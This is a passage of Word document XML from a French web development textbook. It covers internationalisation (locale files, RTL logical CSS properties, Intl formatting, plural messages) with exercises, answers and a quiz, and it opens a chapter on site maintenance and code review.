        <w:t xml:space="preserve">  "panier.titre": "Votre panier",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "panier.vide": "Aucun article pour le moment.",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "panier.total": "Total : {montant}",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "panier.commander": "Commander"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Charger et détecter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Chargement à la demande, une locale à la fois</w:t>
        <w:br/>
        <w:t>async function charger(locale) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const reponse = await fetch(`/locales/${locale}.json`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!reponse.ok) throw new Error(`Locale indisponible : ${locale}`);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return reponse.json();</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Détection initiale, avec repli explicite</w:t>
        <w:br/>
        <w:t>const preferee = navigator.language;             // "fr-CD"</w:t>
        <w:br/>
        <w:t>const supportees = ["fr", "en", "ar"];</w:t>
        <w:br/>
        <w:t>const locale = supportees.find(l =&gt; preferee.startsWith(l)) ?? "fr";</w:t>
        <w:br/>
        <w:t>document.documentElement.lang = locale;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.128 — Cinq pratiques d'organisation</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8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Pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Bénéfice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clés stables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Traductions durables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Discipline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Fichiers par langue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Chargement ciblé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Synchronisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Repli explicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais de page vide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une langue de référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Pseudo-localisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Repère les textes trop longs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Test automatisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation en intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clés manquantes détectées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration</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TESTER UNE TRADUCTION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Passez l'interface en pseudo-locale (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>[!!! Ɓöñĵöüŕ !!!]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Vérifiez les débordements et les troncatures.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Testez en arabe avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dir="rtl"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Vérifiez chaque date et chaque montant affiché.</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lang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditionne prononciation, césure et rendu typographique.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dir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> déclare le sens de lecture ; il ne suffit pas sans propriétés logiques.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propriétés logiques remplacent les directions physiques.</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Intl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> formate dates, nombres, devises et pluriels selon la locale.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messages complets se traduisent ; les fragments concaténés non.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texte traduit change de longueur : prévoir de la marge.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clés de traduction doivent être stables et jamais être les phrases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le site parle plusieurs langues. Le dernier chapitre traite de ce qui assure la durée : la maintenance et le travail en équipe.</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39.1 — Rendre une carte compatible RTL</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Cette carte utilise des marges et des alignements physiques.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Convertissez en propriétés logiques.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 xml:space="preserve">Vérifiez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dir="rtl"</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Contrôlez les icônes directionnelles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 39.2 — Formater une facture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Affichez une date, un montant et un délai selon trois locales.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 xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Intl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, jamais de gabarit manuel.</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Vérifiez les espaces insécables.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Testez le pluriel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 39.3 — Écrire des messages traduisibles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   INTERNATIONALISATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Réécrivez un message construit par concaténation.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"Vous avez " + n + " nouveau" + (n&gt;1?"x":"") + " message" + (n&gt;1?"s":"")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Prévoyez le cas zéro.</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Prévoyez une seconde langue.</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39.1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.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-left: 0;                 /* → margin-inline-start */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: 1rem 1rem 1rem 2rem;   /* → padding-block + padding-inline */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-left: 3px solid #e0a21b; /* → border-inline-start */</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: left;               /* → text-align: start */</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Version logique */</w:t>
        <w:br/>
        <w:t>.carte {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline-start: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-block: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline: 1rem 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding-inline-start: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-start: 3px solid #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-align: start;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les quatre conversions correspondent exactement, sans duplication de feuille de style.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les icônes directionnelles (flèches, chevrons) se retournent via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform: scaleX(-1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en contexte RTL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 39.2</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function ligne(locale) {</w:t>
        <w:br/>
        <w:t>const date = new Intl.DateTimeFormat(locale, { dateStyle: "long" }).format(new</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Date());</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const montant = new Intl.NumberFormat(locale, {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    style: "currency", currency: "EUR",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }).format(1234.5);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const delai = new Intl.RelativeTimeFormat(locale, { numeric: "auto" })</w:t>
        <w:br/>
        <w:t xml:space="preserve">    .format(-7, "day");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return { date, montant, delai };</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>ligne("fr-FR");   // { date: "19 octobre 2026", montant: "1 234,50 €", delai:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "la semaine dernière" }</w:t>
        <w:br/>
        <w:t>ligne("en-GB");   // { date: "19 October 2026", montant: "€1,234.50", delai:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "last week" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dateStyle: "long"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit un ordre et des noms de mois corrects sans tableau manuel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les espaces insécables du format français empêchent le montant d'être coupé entre deux lignes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 39.3</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w:t>
        <w:br/>
        <w:t>"fr": "{n, plural, =0 {Aucun nouveau message} one {Un nouveau message} other</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {# nouveaux messages}}",</w:t>
        <w:br/>
        <w:t>"en": "{n, plural, =0 {No new messages} one {One new message} other {# new</w:t>
        <w:br/>
        <w:t xml:space="preserve">    messages}}",</w:t>
        <w:br/>
        <w:t>"ar": "{n, plural, =0 {لا رسائل جديدة} one {رسالة جديدة واحدة} two</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {رسالتان جديدتان} few {# رسائل جديدة} other {# رسالة جديدة}}"</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'arabe distingue six catégories de pluriel : une concaténation ne peut pas les exprimer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cas zéro est explicite, car « 0 message » ne se dit pas de la même façon dans toutes les langues.</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 xml:space="preserve">Que détermine l'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>lang</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La couleur du texte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La prononciation, la césure et le rendu</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La taille de police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 sens de lecture</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 xml:space="preserve">Quelle propriété remplace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin-left</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en écriture logique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margin-start</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margin-inline-start</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margin-block-start</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margin-left</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 xml:space="preserve">Quel objet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Intl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> formate une devise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DateTimeFormat</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NumberFormat</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Collator</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ListFormat</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Pourquoi éviter de concaténer des fragments traduits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Pour la performance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Parce que l'ordre des mots varie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Pour la sécurité</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Ce n'est pas un problème</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 faut-il prévoir pour un texte traduit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Une longueur identique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Une marge de 30 % environ</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Une police unique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Un alignement à gauche</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Il indique la langue du contenu aux navigateurs et aux technologies d'assistance.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suit l'axe du texte, donc le sens de lecture.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NumberFormat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>style: "currency"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gère le symbole et le placement.</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Chaque langue a son ordre et ses accords : un message complet est nécessaire.</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L'allemand ou le finnois allongent fortement les libellés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>40. Maintenir un site dans le temps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Revue de code, documentation, dette technique et travail en équipe : ce qui distingue un projet livré d'un projet durable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 39</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Conduire une revue de code utile et bienveillante.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Écrire une documentation qui vieillit bien.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Identifier et traiter la dette technique.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Organiser des branches et des versions.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Transmettre un projet à un autre développeur.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>40.1 La revue de code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une revue de code vérifie trois choses : la correction, la lisibilité et la cohérence avec le reste du projet. Elle ne sert ni à imposer un style personnel ni à réécrire le travail à la place de l'auteur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.129 — Cinq niveaux de revue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43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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
